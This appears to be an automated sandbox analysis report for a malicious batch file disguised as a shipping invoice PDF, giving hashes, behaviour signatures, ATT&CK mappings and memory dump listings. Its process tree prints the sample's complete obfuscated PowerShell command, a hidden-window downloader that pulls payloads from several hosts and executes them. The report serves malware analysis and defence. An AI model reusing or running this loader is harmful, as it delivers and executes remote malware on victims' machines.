ee6bd635882b8671a4dc5f087d23b486c8ec8a2cef029ebc7b54bed4f87cb87a

General

Target

Label_waybill_original_BL_invoice_packinglist_shipment_09_11_2024_0000000000000000000000000000_pdf.bat
Size

4KB
MD5

bdb2ee22df97ebe7dea52b5c6479e175
SHA1

2d53f84181ca00a1c0eb6a9761e23111b90d2b43
SHA256

a811d2e739d43b7394a0d9ebf5f710827a7d19316039fe76e6ea0fb50ead366e
SHA512

b559cc4a03ed9161688e5eb62adfc57baad6e845ae26c39ef471e37d121d01cd9e50a590b8e4da9a2eb74e35451ae108593bf8f1cadd7a572888b3567cf474d6
SSDEEP

96:JALO6TU9QVMzpFNaRiZhX1IkXMN8LIw67q4+p36ZfJ/LK:cO6TU9PzZaRuhlIkXMScw6G4u6/LK

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	5096	powershell.exe
8	5096	powershell.exe
14	5096	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5096	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5096	powershell.exe
5096	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5096	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4544 wrote to memory of 5096	4544	cmd.exe	85
PID 4544 wrote to memory of 5096	4544	cmd.exe	85
PID 5096 wrote to memory of 4148	5096	powershell.exe	87
PID 5096 wrote to memory of 4148	5096	powershell.exe	87

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Label_waybill_original_BL_invoice_packinglist_shipment_09_11_2024_0000000000000000000000000000_pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Bajeres='Eksempelsamlings';$Wheatgrass=${host}.Runspace;If ($Wheatgrass) {$Gdinforits++;$Bajeres+='Shipless';$Firs='su';$Bajeres+='Samlelinses';$Firs+='bs';$Bajeres+='Relativiseringens';$Firs+='tri';$Bajeres+='Athener';$Firs+='ng';};Function arthrostome($bebop){$Sydvesten=$bebop.Length-$Gdinforits;For( $Gdinfo=2;$Gdinfo -lt $Sydvesten;$Gdinfo+=3){$Iling17+=$bebop.$Firs.'Invoke'( $Gdinfo, $Gdinforits);}$Iling17;}function Omformuleres($Eloining){ . ($Agueweed) ($Eloining);}$Hematoblast=arthrostome 'V.MToo zUdiValW lMeaHa/Nv5S . r0tw Ar( AW OiUnn .d,ooAnwNasM B NOrTwi Pe1He0A . e0Fr;F FW diC n 6K,4Br;So SpxD.6,a4 .;Tr .ur jvLo:Or1An2si1 .Mi0Sw) h BaG,ieThc SkdyoAn/,k2 a0R,1,i0An0G.1Mo0.l1Ab cuF .i UrBeeS.f RoBexTe/ P1 A2g.1Ar.M 0I. ';$Unpuritanic=arthrostome 'SkU ,skleParWh- TAReg ce OnS tGt ';$kermises=arthrostome 'P h rtOvtOnpR,:El/Fo/Cl3 A6In. E5In0Su.Su1Ro7T.7A.. ,2Fl5A.0in/ A .f ZtO,eAcrArcDrh,uaVgn .cBaeSh.kom RdB pSo> ,hUntFltTepSasDi:ya/Pr/Mer,he,tamolHyaPocOpeKosgl. Mts.oSpp,e/GrA,efTutSce er ScBihBeaNonB.c Ue Y. MmFod Sp S> .hH t KtC.p.nsKa:Co/Ka/Unf ,u MnDidJua KcReiReo,en,aarerSurTieSkcN.iG fLee sIn.s,oSyrB,gSt/ini ,m eaIngk.e As.e/EcAUdfP,t ae ar oc AhM aGlnmuc.ie.d.A.mSndLap E ';$Hovedtemaets=arthrostome '.e>P. ';$Agueweed=arthrostome 'Bei .e,uxS, ';$Gdinfonevidence='Chequering';$Nothings = arthrostome 'A e.dcClh BoAl .% IaCap,ypFadStaFotK aNo% n\,ohGuaLibPrbUnuAdbSm. KB ,eUnk . De&Ge&Tr A,e ,cPuhGaoCh KltOr ';Omformuleres (arthrostome 'Pi$ g jl.uoSpb OaTalSt: aMShe Un UnFleStsunkM,e ,vB,rRad,oi hgPjeF sSa= P(Ilc,omL.dIn D /UncSh A $.eN toJatX.h .i.tnTrg,asSp).h ');Omformuleres (arthrostome 'Ab$.tgSmllooArbMiaS lPi:imA rU,cVeoR.cGaeFinCht Kr Aoliu us K= l$ IklieG rB m ri.isDreM sPu.StsTepGol,uiU.tO,(.m$ uH co.yv le .d tFre pmRaa Be at.ls A)Ac ');Omformuleres (arthrostome 'Li[ FNEueGatR,.U,SUde Lr Fv .i lcAteTaPo.oSmi,onGetPrMBraSinTraByg Ce nrB ] F:fr:OrS .e Tc u ,r,ni EtR y.eP rProLutInoa cBroTrlbl ,e=Pi Do[StNGyeAmt S. ,SFieGacunu prDdi ,tExy ,PPhrTroUttreoOrc aoThlPiT PyMopT eAp] I:D,:klT Pl As.a1Di2Fa ');$kermises=$Arcocentrous[0];$Mcen= (arthrostome 'S $V,g ,lE oHub Sa TlDe:.ySK.c ,et nMyeHdm ae .su.t e .r feBnnkosU,=PrNTreAfwUd-u OQubBujkoe ,c.mt.o .Sloyc,s ptI.e,am C. .NHae,etG,.R.WPlealbS C .lT.iC,e Un.et');$Mcen+=$Menneskevrdiges[1];Omformuleres ($Mcen);Omformuleres (arthrostome ' j$KoS Rc,geurnSue .mhoeArs OtC.e BrGeeA,nKrsGg.,kH eMiased Ke,trStsmi[Vo$ KUJan,ip.euKarH,iSytKka ,nLaiAdcDe]U.=Be$ HJue,pmUnaActHyoStbThlTraCos Ft.a ');$Faksimile=arthrostome 'Va$ ES hcBreMin.reBimP.eTys,etF,eMar aeBinOvs P.K,Df.osow nn Ul noFaa,odMeF BiSul aeBa(In$Imk,oe,tr,nm GiU,sKreGrs .,Sp$ FLPoiBrgRen.ei Un,egErsKosB.yugsMotHie.em.reRetIm) a ';$Ligningssystemet=$Menneskevrdiges[0];Omformuleres (arthrostome 'Ge$Irg.elStoLabSla .lJe:BoMw.eSklV.dYaeSudR,=K (HyTTae ps,ut .- iPReaXetR,hBa ,e$ TLStiPrgFan,fiNonSlgFasSls ,yF s mtQue Bm.oeuntTr)Tr ');while (!$Melded) {Omformuleres (arthrostome 'Bl$ Ig .l aofibLaa,elAs:KiT.thF eUncDraYgp,gh .oO,r .eVe=Sk$ ,tTrr.euGee ') ;Omformuleres $Faksimile;Omformuleres (arthrostome 'RuS DtTya TrNotEx- ,SOvl,leNoeK.pTa E4 o ');Omformuleres (arthrostome 'B $ ,g Fl SoChb Ya alUn: ,MG.e Pl DdB,eTrd ,= T( .T.ae assat s-ReP Oa rtMuhPr $ iLDiiEfgVinA i Bn Ignds.dsRay sFot .e emInePrt e)Ta ') ;Omformuleres (arthrostome 'Am$ Pg flflo.rbM.aSklOr:L,SCokBiuAurCakVeeRin.ieCas =K.$ ,gE,lTeoKrbTuaOrl i: PKPhj.loAnrCatKoeSal akgolPadTrtS + S+ %Sc$ MA.trRecUnoUncThe Pn Pt,orDro .uS.s C.moctro euRenFrt O ') ;$kermises=$Arcocentrous[$Skurkenes];}$Ferskenen=302018;$Staldendes=27144;Omformuleres (arthrostome 'Un$ .g olTaoEubmia jlU,: Ma,a eatugSteSmrdrstr ,f=Fe BlG ae tM.-.uC Fo ,nH to,e.un At No$T.L Ei Ug Sn SiLanR.gResM s,pyO sDitAne .mBaeFetMi ');Omformuleres (arthrostome 'Ps$VigdulI o,abDiau,lMy:giLV,iAfbFreAgr,aa fl iPesK.i hn .g A a=Fa An[PrS.fyMesAltsae GmAd.ImC Ro.lnovvPreLoruitPa]S,: A:F FOmrDko Dm CB LaMasAfePe6Ca4,jSOut LrSti.nnShg (Mo$S M SaE aU,gUne MrCasi,) E ');Omformuleres (arthrostome 'Ah$ChgPll aoT b.raU lja: tSWaukabSurVai UdnyeR nFitSklHyyGo Po=di A [CoSC ygusDatUneAnm u. TSee CxVitUn.TtEBynGacstoL.d niShnV.g.l]ve: :StASpSS.Ct.ISiIPu.MaG,reSit ASBotE,r Ei Sn mg ,(Be$,oLFoiOvb eAdrUna,olati Ds Gi nM gT.).e ');Omformuleres (arthrostome 'Af$ sg SlProWhb ga ClEn:FoTU.rTeo,lw ks,e=A.$,oS,euJubGrrLai.xdlyeEnnGetF,l ,yLo.SpsEmu.rbSks itStr .iGen Sg D(O.$ PFPseUnrBrsIgkL ePhn SeNenp., a$TrSM,tBea KlBedf,efrntodUde,os.i)Ob ');Omformuleres $Trows;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\habbub.Bek && echo t"
    3⤵
    PID:4148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_if5qfs3j.smc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/5096-2-0x00007FF830C63000-0x00007FF830C65000-memory.dmp

Filesize
8KB

Download
memory/5096-8-0x000001F1048E0000-0x000001F104902000-memory.dmp

Filesize
136KB

Download
memory/5096-13-0x00007FF830C60000-0x00007FF831721000-memory.dmp

Filesize
10.8MB

Download
memory/5096-14-0x00007FF830C60000-0x00007FF831721000-memory.dmp

Filesize
10.8MB

Download
memory/5096-15-0x00007FF830C63000-0x00007FF830C65000-memory.dmp

Filesize
8KB

Download
memory/5096-16-0x00007FF830C60000-0x00007FF831721000-memory.dmp

Filesize
10.8MB

Download
memory/5096-17-0x00007FF830C60000-0x00007FF831721000-memory.dmp

Filesize
10.8MB

Download
memory/5096-18-0x00007FF830C60000-0x00007FF831721000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing